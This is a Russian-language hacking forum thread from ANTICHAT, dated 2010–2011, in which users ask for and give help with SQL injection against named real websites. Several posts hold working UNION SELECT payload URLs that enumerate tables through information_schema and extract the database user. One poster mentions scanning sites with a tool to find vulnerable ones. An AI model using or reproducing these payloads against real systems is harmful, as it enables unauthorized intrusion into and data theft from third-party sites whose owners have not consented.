ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.12.2010, 11:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
очень часто поподаются бд из которых выводится только
CHARACTER_SETS
как быть в таком случае?
http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--
|
|
|
|

31.12.2010, 11:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qaz
qaz said:
очень часто поподаются бд из которых выводится только
CHARACTER_SETS
как быть в таком случае?
http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--
facepalm !!!, испортил настроение ...читай школоло мануалы..не забудь остановится в разделе про LIMIT ...откуда вы беретесь...иди лучше уроки готовь и пиши сочинение "как я провел новогодние каникулы"
|
|
|

31.12.2010, 17:25
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
qaz
Как бы воут,почитай факи.
http://www.feb.spb.ru/news.php?id=100+union+select+1,group_concat(table_ name),3,4,5,6,7+from+information_schema.tables--+
|
|
|

01.01.2011, 00:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 30555
Репутация:
85
|
|
Если кому не трудно - поясните мне такую ситуацию
Сообщение от None
http://www.mibf.ru/index.php?id=-1%20UNION%20ALL%20SELECT%20null,%20null,%20NULL,%2 0NULL,%20null,%20null,%20null,NULL,%20NULL,%20NULL +--+
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал, почему это случилось, что это и с чем это едят, за ранее благодарю ))
|
|
|
|

01.01.2011, 00:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от eclipse
eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))
не понял о чем ты, но там блайнд иньекция
|
|
|

01.01.2011, 02:46
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от eclipse
eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))
потому что
includer.php
|
|
|

01.01.2011, 04:42
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
снанил сайты и попался такой:
http://www.sonicscience.com/store/index.php?id=0+uNioN+alL+sEleCT+1--
можете сказать что тут "уязвиного" ? как то я ничего не видел там.. но прога выдает, как уязвимым.
|
|
|

01.01.2011, 15:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
B1t.exe
там ничего нет.
и давайте не будем обсуждать подобного рода, и будем больше использовать свои знания.
|
|
|

01.01.2011, 19:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 7263
Репутация:
0
|
|
Доброго. объясните темному пожалуйста, куда копать в таком случае:
https://secure.webblake.com/ShoppingCart569.php?k=query_here
не выводит ошибки вовсе. только саму квери если битая.
в тоже время параметр учавствует в 2х запросах, и вывести его, чтобы не вызывало ошибки - не могу.
|
|
|
|

01.01.2011, 22:50
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
Сообщение от eclipse
eclipse said:
Если кому не трудно - поясните мне такую ситуацию
Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал,
почему это случилось, что это и с чем это едят
, за ранее благодарю ))
http://www.mibf.ru/index.php?id=-1+union+select+null,null,null,null,null,null,null, user(),null,null--+
И в адресной строке ты увидешь:
http://www.mibf.ru/mibf@localhost
Ну ты понел...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|